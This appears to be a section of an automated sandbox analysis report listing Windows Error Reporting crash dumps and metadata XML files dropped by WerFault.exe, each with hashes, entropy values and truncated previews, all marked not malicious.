Preview:	MDMP..a..... .......d..g........................l...........$....B..........T.......8...........T............+...A..........X...........D...............................................................................eJ..............GenuineIntel............T...........Y..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBF9.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8358
Entropy (8bit):	3.705597275533183
Encrypted:	false
SSDEEP:	192:R6l7wVeJiN66GU6YNESU9paugmfyGpBT89bv9sf0Blm:R6lXJA66GU6Y+SU9pTgmfylv2fX
MD5:	F0A87166622862F66270522B9614F2E4
SHA1:	75C76FC6B197665FC9E6415DB8EE666A57289B13
SHA-256:	3F8E26DC697D6FB12003DD80CC86B043AC526DE4E79FF42B4CD05A6DC2F8896A
SHA-512:	973790F0E632ECDDD0501D89D822A3A006F5C79DD9FBCBD9EC0B38A70ED4FB1D5B17CB2A7983D17F8632AF5DB053587A6554E0ACED61EF7AA9120F308E3A81F1
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC28.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.502661666826595
Encrypted:	false
SSDEEP:	48:cvIwWl8zsrJg77aI9OpiK3WpW8VYkYm8M4JhfF5+q8b1Gh+HeeVFd:uIjfFI7yiT7VEJ1AGh+HeeVFd
MD5:	E0A8F91E42DD917729EEE2FEEE29B8A2
SHA1:	7D92889EEC326CBEBA306EFD2B6176EBA1EBFE26
SHA-256:	B5FF8EF99580317CEB2EC66F1B32D52C6CC1B875089421A8C73B220704788622
SHA-512:	1AB74E6A914463897568BC31BA4EF5CA5F29914E8EB04E5324FB0F037A2C8635FDC2265234A404854624482D95BE7AA6B693B86BE9142E8A7C8580C87AE06150
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670899" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF24.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 06:36:21 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	93102
Entropy (8bit):	1.9983360892891107
Encrypted:	false
SSDEEP:	384:uoryLebSOGXSg0XcZCE1ndPRpbPt01IlTl//XYKGPSEMdokglgS0v:uoryLe/GXSg2SRpbPt0ghXA
MD5:	18706F32F6214B2750237F53D887BC9D
SHA1:	10B8D3D6728BF022FEC5FFFC3B62B612BBBE2F3D
SHA-256:	E20DC6AE9B0CA1366A46B0B45739559A9D690ACE3EE43BA1BA92F9B438B8563D
SHA-512:	F17595C31606348C451EF5E4E21BB75FE6E780023B3F46D6293B8A24FA78CC86A84550194A8B413E3B6AD2E8B6005C3F31E7B6BCC4236769AA9126C5A2762EA0
Malicious:	false
Preview:	MDMP..a..... .......e..g........................l...........$....B..........T.......8...........T............+...@..........X...........D...............................................................................eJ..............GenuineIntel............T...........Y..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC05E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8358
Entropy (8bit):	3.7076018715017565
Encrypted:	false
SSDEEP:	192:R6l7wVeJiI6Luw6YNsSU99CgmfyGpBM89bm9sf3im:R6lXJV6Luw6Y2SU99Cgmfy4m2fD
MD5:	448C90828B4D2F294A908BB2AFBA53E9
SHA1:	FDF2AE904B98AA364676144246D1614AC7300CFF
SHA-256:	B5504451F2B74BC8951BD8CE7C6074B5FFA8E28A48B35588E694AC05A2E2E881
SHA-512:	9553D297E7447D4DAD92E05EFB58C1E68F7F27A065CF2781BBD7627343F78731F282A912B00D7D4482E017D7D8D6D46D01CAC2A0809F8198BC99FAC830BA1211
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1B6.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.502322319648114
Encrypted:	false
SSDEEP:	48:cvIwWl8zsrJg77aI9OpiK3WpW8VYGYm8M4JhfFI+q8b1Gh+HeeVFd:uIjfFI7yiT7VmJkAGh+HeeVFd
MD5:	4F45B3AA9034401C97BDE103053A78C2
SHA1:	8F23D956733231E0CB8D878E6FDDD27847A26579
SHA-256:	9AA7A3482604111D4B7A8F5FA04B25767562C170180775F2C185CE04271B1127
SHA-512:	0F5380F28BEBEF1F33085147B358D94433CA0991A54278843B2C87C2A13087D73B58285CC07A34848663D1FCD6D9006710A54A5CBBDDAFE4A38E84AAD46B7875
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670899" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB88.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 06:36:24 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	37792
Entropy (8bit):	2.53626579801164
Encrypted:	false
SSDEEP:	192:655TX6z9XX9E1nlYX2uOClUt2Dh6LC/28e/yVgp+U6BxvhDjOOS1oyTPw42f:z19EllrpXMf28heYxBji/
MD5:	3BEDB7CBD8F3AB0EF669D6E54C745BB4
SHA1:	2BB912CFFAAA03C344472BAB58036FA387B0C610
SHA-256:	68E2F931C7B3FE8D5BB59A0803452632A91260BAC0F52682BEBEF51F97BA0FCB
SHA-512:	BBA4BE98D351C4EB09081BDDFC6712524E20CE64CB5511A94F19C928C34B46EFE066E923F6579198AD8F4E15A2CB69E053F97437D202EE1C37C1DB174C68F0F9
Malicious:	false
Preview:	MDMP..a..... .......h..g............4...............<.......d....-..........T.......8...........T...........H1..Xb....................... ..............................................................................eJ......d!......GenuineIntel............T...........Y..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD3E.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8324
Entropy (8bit):	3.7002788069755113
Encrypted:	false
SSDEEP:	192:R6l7wVeJim6IFg6YNvSU98/zIgmfOMpDA89bC9sf0Wm:R6lXJr6IFg6YVSU98/zIgmfO8C2fc
MD5:	8DB257463BCDF419EE417EAF46E2D38B
SHA1:	F7E04DEB25AEA6B329100C9EADD21846792634B2
SHA-256:	0EB0810A4B3EB9E1849E7F64D281E17975AC44F35F4FC6FC78ABD8EF343A831E
SHA-512:	EDA5D7CF87078236B5629B0D55C03E8EEC021D268E144D3313F871F17F6522C1501C3E5017898294C142C2E0CE51D4AB30A869531701096E99B23D705F4B1425
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD8E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4583
Entropy (8bit):	4.4674656982643866
Encrypted:	false
SSDEEP:	48:cvIwWl8zsrJg77aI9OpiK3WpW8VY0Ym8M4JhBF2e+q8uOGh+HeeVFd:uIjfFI7yiT7VEJVWGh+HeeVFd
MD5:	03F5734BE6B7C4220B50056101EF2911
SHA1:	4436702F34C94EC5674D8A213E92DD95783E1731
SHA-256:	C239DBA68CBF11CA9DF74CDE3A8BA35129D61ACCFDE968924B4AEAD969DE314D
SHA-512:	DEE1B479AF60987DFB85BFF636E8C39E8F5BCB3B55552C32EE7724E4E19518AEF8225761203A545260E059D70769C35E5E431D7DD566934096ACDA95BB0CEDEE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670899" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB86.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 06:36:28 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	58022
Entropy (8bit):	2.079509957867539
Encrypted:	false
SSDEEP:	192:eqtThG6XvN7XkPBbqgOCgthxlaSY4s4JU2BWKX3agCAAgUkfiUxxpMwJ9:DtFVNo5b4xhfm4WK6SNfxx9
MD5:	3C8544BD237B5EAD3CC3FA494A0876D4
SHA1:	0DC3750A49CE1F9491BBBDF9136DDF4A28CE083F
SHA-256:	FAF26C5C2FDE214757436EC2139A10B1B8F77680D477A071511F3B64373C2C33
SHA-512:	3C1C84BF4B8D01CD7B4F3B4EAD1BCA6BF69D8FF74F7E16D23501A22008ED18AAE56E55FF7F5388331957BA8AAA0822D323F0961765D662E5C2ED10B212368892
Malicious:	false
Preview:	MDMP..a..... .......l..g........................................./..........T.......8...........T.......................................................................................................................eJ...... .......GenuineIntel............T.......t...g..g............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBC4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 06:36:28 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	23534
Entropy (8bit):	2.4344057170112228
Encrypted:	false
SSDEEP:	192:eqA+aXi3LXHnYIOOgHBTWnYEjML9y8qKs:HB3jnOvBvL9ls
MD5:	97AEA3AC6856A62A90A35BFA8FAE9664
SHA1:	56BE79F3CEE6F8304F93ED8CD850E4D4E2A1320F
SHA-256:	7A358F164EE573D1443A8E65A4FF5D875B04A0910B634468797A42B84FA945DD
SHA-512:	8D46F3A3A55B0E977BFA73D1EBA9C9ED2BCEF606215CB6CC93F8208BF48A4C9EB1A2E1FC6B61B59AB4CD6911685B8ECD4074F9F2F6B1F427DBDFC4A6C2BD1810
Malicious:	false
Preview:	MDMP..a..... .......l..g............4...........\...<.......d...\|!..........T.......8...........T...............>G......................................................................................................eJ..............GenuineIntel............T...........g..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC81.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8300
Entropy (8bit):	3.6960660488605623
Encrypted:	false
SSDEEP:	192:R6l7wVeJcq6si6Yyw6ANogmf2TpDj89bnSsf0BKFNm:R6lXJB6J6Yd6ANogmf2inRfAKO
MD5:	186C1964F7392E9BDFB7F4C12BF4E17C
SHA1:	765774F59922546CEB1D31A4F516B78E7EB7FB7A
SHA-256:	91D593EDFBC3AEE6EDA41F3C1361221C9B07B30D6BC83F5C9AB554D6BF152219
SHA-512:	9C8E519249623D8957820B73E8A60541C9AAEF83F97B6F015EBA482D6484DE3E0FDAC778CCB643748124F6BEF3A709BD83825FF781CA7CE8B6CD63F54191743D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCBF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7041645906896177
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+Y6Aj6YNzSU9lhgmf5GpBM89bngsf7tNm:R6lXJR6E6Y5SU9lhgmf54nzf72
MD5:	AC8449AF7F77F1B10AA27F4145DFA8DD
SHA1:	7724BBEBD8655AFA77C1F240DEB57B2B137927EA
SHA-256:	37755C6B20E3AB3155F5C5782C737EC4CB5BB010A246E32FD7493230DBEE4372
SHA-512:	920C41D6FCFA8F02CEC8F2EC1CE3A918C71ADA1B5B2DE88C79C1A14AD2FA3C18F88245DEB5AC1C8DD972EC207A3774067AE9C7577F39E26417376A3367FD99F7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCC0.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4583
Entropy (8bit):	4.443926935343368
Encrypted:	false
SSDEEP:	48:cvIwWl8zsrJg77aI9OpiK3WpW8VYFYm8M4JxuFgOo+q8mfBHepqDwMdd:uIjfFI7yiT7V5J4oXBHepqLdd
MD5:	3854DA5F943D0C8F05132D04001F6621
SHA1:	B089AA7EEBF4162BA6CEEB8F6DC17E252C3672FF
SHA-256:	EFE7568D8E5D68D810D4459B274846A11BE55E46633ECD6002B8EEC4B14454AC
SHA-512:	F193B65D7048480CDF097C25DA3571C0CE68091209DCD70A3DD07749A493029C2CF69A4F1C1016C315CF8861C1386B4534DF0ABE27403532E07D3866E52DDD42
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670899" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCDF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.481299758687214
Encrypted:	false
SSDEEP:	48:cvIwWl8zsrJg77aI9OpiK3WpW8VYoYm8M4JxfFI+q8whsBHepqfd:uIjfFI7yiT7VEJ8JsBHepqfd
MD5:	0A133F37883E39B5799077773517A9B7
SHA1:	B35CDA6423AF70CD3E93AF9FA73E18E8414BCCD8
SHA-256:	B3B47CC7ED2485E6DFB457DFCC919F23A4AD47BA7B90449518EFEF17ABE70B24
SHA-512:	D24B34C118C53C8EDB5D3118DCA8CA7DF4967AEE93CAAC100284BBB0B9D3C10E91C69FE5EC2CB4947DB4934DE27034516FF56330226F804422BAE720A4708434
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670899" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE440.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Jan 11 08:02:24 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	56944
Entropy (8bit):	2.077299130974161
Encrypted:	false
SSDEEP:	192:eGwXyXSDXzntsUcTEOCgtgI0lDpYjkT3vq2a/gyH3avCAAgCkfiExtqgxkNJ:7sPntsUcTLxgIaqZgyqzNPxtTCJ
MD5:	8DB5CB1F36A531CECD89CBC1B20AF4EA
SHA1:	DA1F95F61A2162B114B91BC0BDB2BAC97B7CC52A
SHA-256:	119602A6968B882E016AB4B6824E72C42DBFB2AC1D7D13F8CE92423086CE449B
SHA-512:	BE1F201F29DAC093A5049E383B7619439FE74788BCAC9FC76070DC1ABD548775C7AA761399F470B65C6F25FC0BF162AB3BDCB854E564DEF38EE9598302C6C7B2
Malicious:	false
